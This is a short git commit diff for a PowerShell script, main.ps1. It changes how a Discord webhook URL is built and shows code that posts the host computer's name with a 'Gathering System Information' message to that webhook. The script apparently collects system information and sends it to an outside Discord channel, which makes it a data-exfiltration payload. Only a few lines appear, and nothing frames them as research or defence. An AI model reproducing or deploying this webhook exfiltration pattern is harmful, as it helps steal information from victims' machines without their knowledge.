Update main.ps1

This commit is contained in:
egieb
2025-06-19 16:33:02 +00:00
committed by GitHub
parent 680ce8f34e
commit 2419974958

View File

@@ -26,7 +26,7 @@ else{
sleep 1
Add-Type -AssemblyName System.Windows.Forms
$hookurl = "$dc"
$hookurl = ("https://discord.com/api/webhooks/" + "$dc")
# Send a notification to discord on start
$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":computer: ``Gathering System Information for $env:COMPUTERNAME`` :computer:"} | ConvertTo-Json